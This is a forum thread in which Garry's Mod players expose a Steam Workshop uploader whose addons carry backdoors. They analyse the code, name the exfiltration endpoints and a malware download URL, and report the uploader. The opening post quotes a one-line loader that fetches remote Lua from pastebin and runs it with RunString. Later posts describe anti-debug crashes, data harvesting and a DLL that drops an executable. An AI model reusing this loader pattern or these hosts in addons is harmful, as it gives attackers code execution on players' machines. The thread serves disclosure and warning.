Found a user on the workshop that's uploading addons with backdoors. - General Discussion

https://steamcommunity.com/id/_BANNED783/myworkshopfiles/?appid=4000&p=1 this is the workshop link Almost if not all of the addons(models included) have a script placed in autorun/client/something.lua which is: --good luck in deobfuscation <3 http.Fetch("https://pastebin.com/raw/4k1kdj7J",RunString) In the little bit that ive been able to actually deobfuscate ive noticed it sending data via http to hxxp://solly.ml/loges/loges.php after it does that, it crashes the game. I've reported the addons as well as the pastebin link to the correct people, also posting here for reach

--good luck in deobfuscation <3 what a piece of shit

i expect nothing less from russians

*hacks your election*

I mean just look at the screenshots for this addon: https://steamcommunity.com/sharedfiles/filedetails/?id=1645014431 https://steamuserimages-a.akamaihd.net/ugc/956355284415322218/A11B04DACE9DE23B0EF3CFD074BE061A01C7352E/?imw=637 https://steamuserimages-a.akamaihd.net/ugc/956355284415322137/93C0CEA7315C566D021B761B169CAD52B342C0C4/?imw=637 Definitely got a thing going on with being an asshole

I had a good laugh from these.

https://files.facepunch.com/forum/upload/418840/a83a767a-8b35-4f1c-993b-c5fe224b31a0/image.png Even though he just boosted the description, I still find the fact he didn't leave out the donate tab hilarious

I hate to bump this, but even though all his shit was removed, he's right back at it again and has three more-than-likely malicious addons. @Rubat Is it even possible to ban users from ever uploading to workshop ever again? This guy ain't gonna quit.

I have said many times, Steam moderation tools are completely useless garbage, so no. The user linked above has no workshop addons.

It's broke, the dude's still uploading. I can see his shit on the newest first page of the Gmod workshop sorting by models right now. Clicking on his name there brings up all his current garbage. https://files.facepunch.com/forum/upload/2014/74d6de10-1266-4b18-ab59-2f644c61c94e/image.png I flagged all of it.

this dude loves control characters as obfuscation apparently.

Already done it dw dude. It posts data to: http://solly.ml/turbomemes/suuuuuuuuuuus/ if you pass the right checks and returns a shit load more (I will get this in a minute) Initial code: https://pastebin.com/raw/rvnwrcdT Returned code: https://pastebin.com/raw/4K1Ct3i5

What the fuck? I can't even read half of that, what all is it fetching?

So by the looks of it they tried to stop it from running if someone was debugging it and force crashed their game. The code then posted all of their information to http://solly.ml/turbomemes/suuuuuuuuuuus/ which grabs the second pastebin link This one puts a vgui on your client and copies their discord to your clipboard and then makes the server say this 2 = hello invitation to our discord already copied to your clipboard 2 = 10 | your gmod will be closed in 10 seconds 2 = 9 | no need to debug my scripts anymore 2 = 8 2 = 7 2 = 6 | also all the information about you has already been sent to us 2 = 5 2 = 4 2 = 3 2 = 2 2 = 1 | see ya later Also they tried to fetch and post to their discord link which is interesting

Steam Community They are not done re-uploading with malicious intentions yet it seems: https://files.facepunch.com/forum/upload/321820/fbaa1161-4ce1-44ba-8519-2dc88227e2bb/image.png Hilariously, they've now also begun renaming the maliciously autorun lua-file to "model-installer.lua", as if such a thing was supposed to convince you not to open and investigate it: https://files.facepunch.com/forum/upload/321820/e7b80504-643d-4400-877e-3dadeee4259d/image.png Although supposedly, it is no longer existing workshop content that they are targeting.

lol, such a jerk

The guy is banned from uploading and can still do it? That sounds like a serious fucking exploit

This map is kind of is a backdoor, It has something that prevents the map being loaded, and just crashes you. Pretty sure this falls under the rule for Malicious Code https://steamcommunity.com/sharedfiles/filedetails/?id=1667522388

Seems to load perfectly fine for me pic

I decompiled it, it doesn't actually have any backdoors. The reason it doesn't load is because the map's filename has a period in it which source interprets as the end of the filename https://files.facepunch.com/forum/upload/109932/93b0ab34-99cf-4677-9c6a-7de8f3852b8a/image.png

He ain't banned, Rubat said a few posts up that he can't straight up ban anyone from uploading shit. Thanks, Valve.

If anyone cares I ran it through glua.team lua formatter™ and got most of the job done, rest can be done with a simple script, you'll need to filter out the right to left override characters to be able to read it properly though, but you can easily tell what it does atm anyways https://gist.github.com/Velkon/d285618e3920f3910b79e30537a204be

With some nice find and replace spam, this is what the above looks like. https://pastebin.com/raw/L1erZKBa Doesn't really look any different from what DEADMONSTOR put up. However, I talked to a friend about this and unless they were using some exploit to get shit from outside Gmod's own bounds, all they can get is: - Your location (Probably derived from IP) - What time it is on your system - What language you're using - Your username - Your SteamID It doesn't seem to make any additional attempts to fetch any files or anything else, like from your data folder or whatever. It seems like, just one of those things where they're going "lol haha lets see how many people i can hit with this" and logs every hit to a database or something. Friend's thoughts: "If I had to REALLY guess, there's a possibility the entire point is to find out how many people they can reasonably get code executed on before getting caught before deploying their real shit." Seems as though getting caught doesn't really matter however, people really don't pay attention and/or don't read, even when the comments and workshop submission discussions were chock full of "DON'T SUB TO THIS IT HAS MALICIOUS CODE", I could still sit and refresh the page and watch the current subscriber count go up. I'm also going to guess that a lot of them were people who can't even read English in the first place, since Gmod has a large non-English speaking playerbase, so they'd be none the wiser.

My bad lol didn't see his post But yeah it should be common knowledge by now that the only malicious thing that scripts can steal from you is your data folder (for some) and ip address

I flagged his addons and reported his profile (if that really works), surely getting community banned stops you from uploading to the Steam Workshop?

After looking into this more I found that he is doing more than this. I got someone coming to me with a DLL that someone said would fix some of his issues. After looking into it, it seems like it downloads a virus http://solly.ml/c/a/c/loader.exe I would just like to say everyone that is given a DLL might wanna check up on what it does because these are nasty exe's that could fuck up your whole PC . Sorry about the bump didn't want to make a new post. https://www.virustotal.com/#/file/6c97fe21e5d5387ce7df9caf890e4fe9626c876e67d0a6e3f97448c2b524f0f5/detection

I'd break that URL up so it isn't actually clickable on accident. So, the attack relies on someone else giving out a bad DLL? Had a bit of trouble following that part.

Broke the link good choice, The DLL itself would need to be done on client then it downloads the exe to C:\ProgramData123\ and runs it. https://i.imgur.com/Hwur7Wp.png https://i.imgur.com/Vu9xefj.png I would get more screenshots but I deleted the exe I didn't want to touch it by accident

If I'm correct, the inital attacks just required a backdoor'd addon. Handing out the DLL is probably their attempt to further fuck people over.

that program is super weird, just a quick strings on it shows a ton of python stuff in it